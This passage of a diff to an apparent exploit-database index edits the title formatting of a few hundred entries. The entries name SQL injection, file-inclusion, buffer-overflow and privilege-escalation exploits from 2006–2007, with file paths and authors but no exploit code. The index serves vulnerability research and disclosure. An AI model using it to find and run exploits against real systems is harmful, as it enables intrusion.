Vulnerablity",2007-01-01,"Aria-Security Team",asp,webapps,0 +3059,platforms/php/webapps/3059.txt,"Bubla <= 0.9.2 - (bu_dir) Multiple Remote File Include Vulnerabilities",2006-12-31,DeltahackingTEAM,php,webapps,0 +3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure Vulnerablity",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber (haberdetay.asp id variable) SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 -3062,platforms/asp/webapps/3062.txt,"autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection",2007-01-01,ajann,asp,webapps,0 -3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 (Name) Directory Transversal",2007-01-01,Bl0od3r,windows,remote,0 +3062,platforms/asp/webapps/3062.txt,"autoDealer <= 2.0 - (detail.asp iPro) Remote SQL Injection",2007-01-01,ajann,asp,webapps,0 +3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Transversal",2007-01-01,Bl0od3r,windows,remote,0 3064,platforms/multiple/remote/3064.rb,"Apple Quicktime (rtsp URL Handler) Stack Buffer Overflow Exploit",2007-01-01,MoAB,multiple,remote,0 -3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 +3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"newsCMSlite (newsCMS.mdb) Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3067,platforms/windows/remote/3067.txt,"QK SMTP <= 3.01 - (RCPT TO) Remote Buffer Overflow Exploit (Perl)",2007-01-01,"Jacopo Cervini",windows,remote,25 -3068,platforms/asp/webapps/3068.htm,"TaskTracker <= 1.5 (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 -3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0 -3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 +3068,platforms/asp/webapps/3068.htm,"TaskTracker <= 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 +3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit PoC (ppc)",2007-01-02,MoAB,osx,dos,0 +3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation Exploit",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow Exploit (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0 -3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 (product_id) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 -3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 +3073,platforms/asp/webapps/3073.txt,"LocazoList <= 2.01a beta5 - (subcatID) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (product_id) Remote SQL Injection",2007-01-03,ajann,asp,webapps,0 +3075,platforms/php/webapps/3075.pl,"VerliAdmin <= 0.3 - (language.php) Local File Inclusion Exploit",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System Remote SQL Injection Exploit",2007-01-03,DarkFig,php,webapps,0 -3077,platforms/osx/remote/3077.rb,"Apple Quicktime <= 7.1.3 (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 +3077,platforms/osx/remote/3077.rb,"Apple Quicktime <= 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 3078,platforms/windows/dos/3078.pl,"Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS",2007-01-04,nitr0us,windows,dos,0 -3079,platforms/php/webapps/3079.txt,"Aratix <= 0.2.2b11 (inc/init.inc.php) Remote File Include",2007-01-04,nuffsaid,php,webapps,0 +3079,platforms/php/webapps/3079.txt,"Aratix <= 0.2.2b11 - (inc/init.inc.php) Remote File Include",2007-01-04,nuffsaid,php,webapps,0 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast (XML title) Remote Format String PoC",2007-01-04,MoAB,osx,dos,0 -3081,platforms/asp/webapps/3081.pl,"DigiRez <= 3.4 (book_id) Remote SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 (user.php id variable) Remote SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3081,platforms/asp/webapps/3081.pl,"DigiRez <= 3.4 - (book_id) Remote SQL Injection Exploit",2007-01-04,ajann,asp,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id variable) Remote SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (eval/SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin <= 7.0.x - (acroreader) XSS",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery <= 1.4.10 - Remote SQL Injection Exploit",2007-01-05,DarkFig,php,webapps,0 @@ -2763,39 +2763,39 @@ id,file,description,date,author,platform,type,port 3088,platforms/osx/local/3088.rb,"Mac OS X 10.4.8 - DiskManagement BOM (cron) Privilege Escalation Exploit",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Include Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 -3091,platforms/php/webapps/3091.php,"L2J Statistik Script <= 0.09 (index.php page) Local File Include Exploit",2007-01-07,Codebreak,php,webapps,0 -3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta",2007-01-07,"Jacopo Cervini",windows,remote,80 -3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 +3091,platforms/php/webapps/3091.php,"L2J Statistik Script <= 0.09 - (index.php page) Local File Include Exploit",2007-01-07,Codebreak,php,webapps,0 +3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit",2007-01-07,"Jacopo Cervini",windows,remote,80 +3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 - (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0 3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include",2007-01-07,GoLd_M,php,webapps,0 -3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 (index.php) Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 +3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - (index.php) Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 3099,platforms/linux/remote/3099.pm,"Berlios GPSD <= 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 3101,platforms/multiple/dos/3101.py,"Opera <= 9.10 JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Local Privilege Escalation Exploit",2007-01-08,MoAB,osx,local,0 3103,platforms/php/webapps/3103.php,"@lex Guestbook <= 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 -3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities",2007-01-09,IbnuSina,php,webapps,0 +3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Include Vulnerabilities",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate <= 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 3106,platforms/php/webapps/3106.txt,"uniForum <= 4 - (wbsearch.aspx) Remote SQL Injection",2007-01-09,ajann,php,webapps,0 -3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 +3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server <= 1.01 - (LIST) Remote BoF Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"WordPress <= 2.0.6 - wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 -3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 (fieldValidation.php) Remote File Include",2007-01-10,irvian,php,webapps,0 -3114,platforms/php/webapps/3114.txt,"Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 +3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Include",2007-01-10,irvian,php,webapps,0 +3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL/XSS) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews <= 1.5.30 - Remote Reset Admin Pass / Command Exec Exploit",2007-01-12,rgod,php,webapps,0 -3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 (show.php PollDir) Remote File Include",2007-01-12,"ilker Kandemir",php,webapps,0 -3118,platforms/php/webapps/3118.txt,"TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include",2007-01-12,GoLd_M,php,webapps,0 +3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Include",2007-01-12,"ilker Kandemir",php,webapps,0 +3118,platforms/php/webapps/3118.txt,"TLM CMS <= 1.1 - (i-accueil.php chemin) Remote File Include",2007-01-12,GoLd_M,php,webapps,0 3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a Unspecified Denial of Service Exploit",2007-01-12,shinnai,windows,dos,0 -3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 (duyuru.asp id) Remote SQL Injection",2007-01-12,chernobiLe,php,webapps,0 +3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) Remote SQL Injection",2007-01-12,chernobiLe,php,webapps,0 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer <= 2.0 - (common.php) Remote Inclusion",2007-01-12,GoLd_M,php,webapps,0 -3122,platforms/asp/webapps/3122.pl,"DigiAffiliate <= 1.4 (visu_user.asp id) Remote SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 -3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit",2007-01-13,ajann,php,webapps,0 +3122,platforms/asp/webapps/3122.pl,"DigiAffiliate <= 1.4 - (visu_user.asp id) Remote SQL Injection Exploit",2007-01-13,ajann,asp,webapps,0 +3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre <= 2.01 - (path) Remote File Include Exploit",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 @@ -2805,171 +2805,171 @@ id,file,description,date,author,platform,type,port 3131,platforms/windows/local/3131.c,"Kaspersky Antivirus 6.0 - Local Privilege Escalation Exploit",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143 -3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0 +3134,platforms/php/webapps/3134.php,"KGB <= 1.9 - (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 -3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,anonymous,windows,dos,0 -3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 +3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service Exploit",2003-07-07,anonymous,windows,dos,0 +3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 - (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include",2007-01-17,v1per-haCker,php,webapps,0 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0 -3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include",2007-01-17,GoLd_M,php,webapps,0 +3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Include",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0 -3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 (lang/index.php file) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 +3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 - (lang/index.php file) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 -3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 (grab_globals.lib.php) Remote File Include",2007-01-18,GoLd_M,php,webapps,0 -3153,platforms/php/webapps/3153.php,"phpBP <= RC3 (2.204) (SQL/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 +3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Include",2007-01-18,GoLd_M,php,webapps,0 +3153,platforms/php/webapps/3153.php,"phpBP <= RC3 - (2.204) (SQL/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs <= 0.70.0 - Local Buffer Overflow Exploit",2007-01-18,prdelka,linux,local,0 3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit",2007-01-19,MoAB,osx,local,0 -3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 +3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE DoS",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC",2007-01-19,oveRet,windows,remote,0 3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - (.HPJ) Buffer Overflow Exploit",2007-01-19,porkythepig,windows,local,0 3160,platforms/osx/dos/3160.html,"Transmit.app <= 3.5.5 ftps:// URL Handler Heap Buffer Overflow PoC",2007-01-20,MoAB,osx,dos,0 3161,platforms/php/webapps/3161.txt,"PhpSherpa (include/config.inc.php) Remote File Include",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3162,platforms/php/webapps/3162.txt,"Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion",2007-01-20,GoLd_M,php,webapps,0 +3162,platforms/php/webapps/3162.txt,"Bradabra <= 2.0.5 - (include/includes.php) Remote Inclusion",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website <= 3.2 - (nl.php g_strRootDir) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3164,platforms/php/webapps/3164.pl,"phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 +3164,platforms/php/webapps/3164.pl,"phpIndexPage <= 1.0.1 - (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach <= 2.1b (up.php) Remote Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit PoC",2007-01-21,MoAB,osx,dos,0 3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java GIF File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Include",2007-01-21,v1per-haCker,php,webapps,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service <= 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2007-01-21,Enseirb,windows,remote,69 -3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 (index.php gen) Remote File Include Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 -3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 (gallery.php) Remote Blind SQL Injection Exploit",2007-01-21,r00t,php,webapps,0 +3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Include Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 +3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - (gallery.php) Remote Blind SQL Injection Exploit",2007-01-21,r00t,php,webapps,0 3173,platforms/osx/local/3173.rb,"Mac OS X 10.4.8 - System Preferences Local Privilege Escalation Exploit",2007-01-21,MoAB,osx,local,0 -3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 +3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 functions.visohotlink.php Remote File Include Exploit",2007-01-22,bd0rk,php,webapps,0 3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit",2007-01-22,porkythepig,windows,local,0 3177,platforms/multiple/local/3177.txt,"Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3178,platforms/multiple/local/3178.txt,"Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0 -3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0 +3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0 3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0 -3183,platforms/php/webapps/3183.txt,"BBClone 0.31 (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 +3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 +3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 +3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3186,platforms/asp/webapps/3186.txt,"ASP EDGE <= 1.2b (user.asp) Remote SQL Injection",2007-01-24,ajann,asp,webapps,0 3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= 3.0 - (news_detail.asp) Remote SQL Injection",2007-01-24,ajann,asp,webapps,0 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0 3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0 -3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 +3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection",2007-01-25,ajann,asp,webapps,0 -3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection",2007-01-25,ajann,asp,webapps,0 +3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) Remote SQL Injection",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 -3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include",2007-01-25,GoLd_M,php,webapps,0 +3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - (vp/configure.php) Remote File Include",2007-01-25,GoLd_M,php,webapps,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0 -3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include",2007-01-26,"Cold Zero",php,webapps,0 +3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Include",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include",2007-01-26,"ThE dE@Th",php,webapps,0 -3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure",2007-01-26,ajann,php,webapps,0 +3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 - (download.php) Remote File Disclosure",2007-01-26,ajann,php,webapps,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow PoC",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 -3206,platforms/php/webapps/3206.txt,"ACGVclick <= 0.2.0 (path) Remote File Include",2007-01-27,ajann,php,webapps,0 +3206,platforms/php/webapps/3206.txt,"ACGVclick <= 0.2.0 - (path) Remote File Include",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Include Exploit",2007-01-27,MackRulZ,php,webapps,0 -3208,platforms/php/webapps/3208.txt,"ACGVannu <= 1.3 (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 +3208,platforms/php/webapps/3208.txt,"ACGVannu <= 1.3 - (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI)",2007-01-27,"ThE dE@Th",php,webapps,0 -3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 (default.asp) Remote SQL Injection",2007-01-27,ajann,asp,webapps,0 +3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - (default.asp) Remote SQL Injection",2007-01-27,ajann,asp,webapps,0 3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit",2007-01-27,"Winny Thomas",windows,remote,6503 